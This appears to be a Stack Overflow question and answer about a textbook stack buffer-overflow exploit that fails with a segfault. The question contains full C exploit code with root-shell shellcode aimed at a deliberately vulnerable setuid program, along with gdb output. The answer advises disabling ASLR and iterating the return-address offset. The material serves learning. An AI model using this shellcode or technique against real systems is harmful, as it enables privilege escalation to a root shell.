1

I was trying to run this buffer overflow exploit on a vulnerable code vuln.c on gcc (I found this on some tutorial and code is not mine).The shellcode spawns a shell.

exploit.c code

#include <stdlib.h>

char shellcode[] =
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

unsigned long sp(void)         // This is just a little function
{ __asm__("movl %esp, %eax");} // used to return the stack pointer

int main(int argc, char *argv[])
{
int i, offset;
long esp, ret, *addr_ptr;
char *buffer, *ptr;

offset = 0;            // Use an offset of 0
esp = sp();            // Put the current stack pointer into esp
ret = esp - offset;    // We want to overwrite the ret address

printf("Stack pointer (ESP) : 0x%x\n", esp);
printf("    Offset from ESP : 0x%x\n", offset);
printf("Desired Return Addr : 0x%x\n", ret);

// Allocate 600 bytes for buffer (on the heap)
buffer = malloc(600);

// Fill the entire buffer with the desired ret address
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 600; i+=4)
{ *(addr_ptr++) = ret; }

// Fill the first 200 bytes of the buffer with NOP instructions
for(i=0; i < 200; i++)
{ buffer[i] = '\x90'; }

// Put the shellcode after the NOP sled
ptr = buffer + 200;
for(i=0; i < strlen(shellcode); i++)
{ *(ptr++) = shellcode[i]; }

// End the string
buffer[600-1] = 0;

// Now call the program ./vuln with our crafted buffer as its argument
execl("./vuln", "vuln", buffer, 0);

// Free the buffer memory
free(buffer);

return 0;
}

This exploit is for the vulnerable code vuln.c:

int main(int argc, char *argv[])
{
char buffer[500];
strcpy(buffer, argv[1]);
return 0;
}

But when I run it using ./exploit it gives a segmentation fault instead of opening the shell.I used the commands:

sudo chown root vuln
sudo chmod +s vuln
ls -l vuln
gcc -fno-stack-protector -o vuln vuln.c
./vuln
gcc -o exploit exploit.c
./exploit

It shows the result:

(gdb) run
Starting program: /home/a/exploit 
Stack pointer (ESP) : 0xbffff338
Offset from ESP : 0x0
Desired Return Addr : 0xbffff338
process 4669 is executing new program: /home/a/vuln

Program received signal SIGSEGV, Segmentation fault.
0xbffff338 in ?? ()
(gdb) info registers
eax            0x0  0
ecx            0xbfe3f5a0   -1075579488
edx            0xbfe3dca8   -1075585880
ebx            0xb76e4ff4   -1217507340
esp            0xbfe3dc60   0xbfe3dc60
ebp            0xbffff338   0xbffff338
esi            0x0  0
edi            0x0  0
eip            0xbffff338   0xbffff338
eflags         0x10246  [ PF ZF IF RF ]
cs             0x73 115
ss             0x7b 123
ds             0x7b 123
es             0x7b 123
fs             0x0  0
gs             0x33 51
(gdb)

Please tell me where the problem lies...

Improve this question
2
  • You're trying to use an exploit from a book published 10 years ago - do you think security in Linux might have improved since then, perhaps ? Commented Jul 8, 2013 at 15:32
  • Does that mean the problem lies in shellcode? I tried to replace it with the shellcode generated by msfpayload utility in metasploit. But it still shows the same segmentation fault. Thanx for the reply! Commented Jul 8, 2013 at 15:50

1 Answer 1

Reset to default
0

Your problem lies in the address you are jumping to....

That exploit does NOT use memory leaks, so it is supposed to be run in a system that does not support ASLR.

Once ASLR is disabled in your system, you have to run the exploit N times until jumping to the right shellcode address...

Function sp() returns the esp on this process, but it may change depending on the backtrace and the process... so you will have to increment a value until reaching the right address.....

Conclusion:

  • disable ASLR
  • add an offset getting iterated each time and add it to the esp value before is used

Good luck!!!!

Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.